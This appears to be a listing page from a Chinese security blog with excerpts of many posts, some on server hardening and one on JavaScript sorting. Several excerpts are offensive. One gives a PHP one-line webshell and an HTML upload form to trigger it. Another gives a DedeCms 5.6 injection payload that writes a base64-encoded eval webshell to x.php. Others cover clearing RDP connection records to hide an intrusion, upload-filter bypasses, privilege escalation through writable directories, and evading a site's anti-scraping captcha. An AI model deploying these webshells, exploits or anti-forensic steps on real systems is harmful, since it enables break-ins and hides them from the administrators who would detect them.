分类: 网络安全 |

文件上传漏洞之图片缩略图

现在背景如下: 

1. 有上传点, 服务器支持PHP
2. 扩展名可自定义
3. 文件的文件会经过GD库处理生成缩略图,原图不会被保存. 如果GA加载不了上图的文件,上传会失败.

尝试了几种失败的办法. 

1. 直接上传PHP

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7444

58同城访问过频繁验证码突破

 58同城数据还是挺多的,很多人可能需要通过抓取58同城的数据来作为第一批种子数据。这非常可行。但是如果你抓取的速度过于频繁,会出现下面这张页面。

 

对于出现这张页面之后可能就没有办法继续访问了,只有更换ip。

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 93734

    Web应用程序开发是一个很宽泛的话题。本文仅讨论Web应用开发者应当避免的安全错误。这些错误涉及到任何开发者都不应当忽视的基本安全原则。

Web应用开发人员最易犯的九个安全错误

查看更多...

Tags: web开发 安全

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 27237

另类PHP一句话小马

利用了include可以把任何文件当php来解释的特性, 当我们上传一个文件的时候,会在服务器上生成一个临时文件,而$_FILES这个变量里面正好保存了这个文件的路径,所以可以直接include进来。

<?php @include($_FILES['u']['tmp_name']);

使用方式也简单构造一个html文件写入如下代码:

	<form action="http:/a.b.c.com.cn/shell.php" method="POST" enctype="multipart/form-data">
		<input type="file" name='u'>
		<button>shell</button>
	</form>
	
	from: <a href="http://www.zeroplace.cn/">www.zeroplace.cn</a>

选择你的php大马点shell运行

我测试的时候的代码就是<?php phpinfo();保存的文件名为1.txt。

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 11803

正确设置php-fpm和nginx防止网站被黑

 核心总结:php-fpm 子进程所使用的用户,不能是网站文件所有者。 凡是违背这个原则,则不符合最小权限原则。

 
根据生产环境不断反馈,发现不断有 php网站被挂木马,绝大部分原因是因为权限设置不合理造成。因为服务器软件,或是 php 程序中存在漏洞都是难免的,在这种情况下,如果能正确设置 Linux 网站目录权限, php 进程权限,那么网站的安全性实际上是可以得到保障的。
 
 

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7419

 phpinfo() 
功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。 
危险等级:中 

passthru() 
功能描述:允许执行一个外部程序并回显输出,类似于 exec()。 
危险等级:高 

exec() 
功能描述:允许执行一个外部程序(如 UNIX Shell 或 CMD 命令等)。 
危险等级:高 

system() 
功能描述:允许执行一个外部程序并回显输出,类似于 passthru()。 
危险等级:高 

chroot() 
功能描述:可改变当前 PHP 进程的工作根目录,仅当系统支持 CLI 模式 
PHP 时才能工作,且该函数不适用于 Windows 系统。 
危险等级:高 

scandir() 
功能描述:列出指定路径中的文件和目录。 
危险等级:中 

 

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7332

fastcoll 生成两个md5值一样的文件

这个工具的出现彻底宣布了md5的死亡

下面介绍使用方法:

首先准备工具: md5校验工具, 一个notepad.exe程序, fastcoll_v1.0.0.5.exe

1. 找到一个可执行文件, 我们以它的文件内容为前缀,这里我选择的是windows下的notepad.exe

2.打开cmd命令行: fastcoll_v1.0.0.5.exe -p notepad.exe -o notepad1.exe notepad2.exe, 此时生成两个文件notepad1.exe和notepad2.exe, 而此时发现这两个文件都同notepad.exe一样是可以运行的

 

查看更多...

Tags: md5

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 24251

针对JS对象数组的Array排序实现

 这里只实现了冒泡排序和快速排序,一般来说也够用了

 点击下载此文件

/*
 * 对Array进行排序
 */
 
var CMPMETHOD = {
  btTimeCmp: function(a, b) {
    a=a.replace("天", "");
    b=b.replace("天", "");
    var as = a.split("年");
    var bs = b.split("年"); 

    var ayear = as.length > 1 ? as[0] : 0;
    var aday  = as.length > 1 ? as[1] : parseInt(as[0]);

    var byear = bs.length > 1 ? bs[0] : 0;
    var bday  = bs.length > 1 ? bs[1] : parseInt(bs[0]);

    var va = ayear * 365 + parseInt(aday);
    var vb = byear * 365 + parseInt(bday);
    
    if (va > vb ) return 1;
    if (va < vb ) return -1;
    if (va == vb) return 0;
  },
  numberCmp: function(a, b) {
    a = parseFloat(a);
    b = parseFloat(b);
    return CMPMETHOD.commonCmp(a, b);
  },
  commonCmp: function(a, b){
    if (a < b) return -1;
    if (a == b) return 0;
    if (a > b) return 1;
  }
}

Array.prototype.swap = function(i, j) {
  var temp = this[i];
  this[i]  = this[j];
  this[j]  = temp;
}

Array.prototype.quickSort = function() {
  var s=null, e=null, k=null, cmp=CMPMETHOD.commonCmp;
  if (arguments.length == 1) {
    s = null; e = null; k =arguments[0];
  }

  if (arguments.length == 2 ) {
    s = arguments[0];
    e = arguments[1];
  }

  if (arguments.length == 3) {
    s = arguments[0];
    e = arguments[1];
    k = arguments[2];
  }

  if (arguments.length == 4) {
    s = arguments[0];
    e = arguments[1];
    k = arguments[2];
    cmp = arguments[3];
  }

  if (s == null ) s = 0;
  if (e == null ) e = this.length-1;
  if (s >= e) return ;
  var x = s;    //基准索引
  var i, j;

  i = s; j = e;
  while(j > i) {
    for(; j>i; j--) {
      if (cmp(this[j][k], this[x][k]) < 0) {
        this.swap(j, x);
        x = j;
        break;
      }
    }

    for(; i

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7755

windows2003基本权限设置

  如果我们有一个服务器,并且我们想要在服务器上运行多个网站的话,我们希望把网站的安全性做到比较好,尽量能把危险限制在一个虚拟主机以内。不让一个网站的沦陷影响到其他的网站!也就是把黑客提权的可能性降到最低。

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 9328

ICACLS命令

 CACLS是windows下常用的设置权限的命令,但是在配置服务器的时候,往往这这命令是不够用的。我们需要一些比较特殊的权限,比如拒绝执行的权限!

比如windows下面iis运行的temp目录。这个目录php运行时是需要的,用来存放一些临时文件!同时这个目录是黑客经常用来上传cmd.exe的地方。基于这个目录的特殊要求,我们需要这个目录可以写,可以读,但是不能执行exe!对于这种过分的要求,cacls是做不来的!

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 15080

DEDE5.7 爆出后门

 汗,dede5.7版本竟然被搞了个后门出来,不知道是不是真的,好像很多人都在说这个事!

 

 

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 9281

MySQL:如何编写UDF

1.什么是UDF

UDF顾名思义,就是User defined Function,用户定义函数。我们知道,MySQL本身支持很多内建的函数,此外还可以通过创建存储方法来定义函数。UDF为用户提供了一种更高效的方式来创建函数。

 

UDF与普通函数类似,有参数,也有输出。分为两种类型:单次调用型和聚集函数。前者能够针对每一行数据进行处理,后者则用于处理Group By这样的情况。

 

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8458

mysql复制文件

 使用mysql的函数,load_file和dumpfile是可以实现复制文件的,但是不能覆盖文件!

代码如下

drop table temp_mix;

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6764

淘宝开放平台新的授权验证方式

 看来DEMO才懂,淘宝的文档也太那啥了...贴出来

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8568

Windwos下hacker学习流程图

 

 

一:注入类: 
access数据库 
<1> 
首先猜解管理员密码: 
手工猜解(当然,如果你有基础,这里就很简单。如果没学过,其实只要记下一些常用的语句就可以了。) 
工具猜解。我建议用zwell的穿山甲,也就是pangolin..或者是NBSI。前者猜解速度非常强悍。而猜解的准确率两者都很好。

 

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7087

DedeCms v5.6 恶意代码执行漏洞

 影响版本:

DedeCms v5.6漏洞描述:
在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用
测试方法:
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="'']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行

a{/dede:link}{dede:toby57 name\="'']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得SEBUG安全建议:
 

 

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7130

清除本机mstsc留下的记录

有人可能会疑惑,清除本机的记录,有什么用?当然有用,假设你在A机登录了B机,又在B机登录了C机,A机上的记录当然无所谓,但如果你不想让B机的管理员看到你登录了C机从而发现有人入侵,那你最好清除一下B机上的日志.

查看更多...

Tags: mstsc 记录 清除 3389

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 14536

可写可执行的危险目录

       现在的服务器安全越来越BT了,事实证明站长们也开始重视安全了,但是还是有一些细节注定成败,比如下面的一些危险文件夹,如果没有做好安全,很可能服务器就被入侵了。

       众所周知要成功提权服务器,就要找到可写可执行目录,可近来服务器的目录设置越来越BT,几乎没有可写可执行目录。另一个“提权思路”出现了。寻找服务器 上安装的第3方软件某些文件的权限问题来进行文件替换,将这些文件替换为我们的cmd.exe和cscript.exe来提权,经我测试发现以下服务器常 用软件的某些文件权限为Everyone即为所有用户权限,可以修改,可以上传同文件名替换,删除,最重要的是还可以执行。

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7674

短名突破可执行文件上传限制

  建立非法文件,利用短名还可以突破360。上传cmd.exe1,其短名为CMD~1.EXE,可当EXE来即可。

查看更多...

Tags: 可执行文件上传 文件上传

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8423

星外虚拟主机可写目录总结

星外主机的可写提权目录总结

查看更多...

Tags: 星外主机 提权 可写 目录

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8702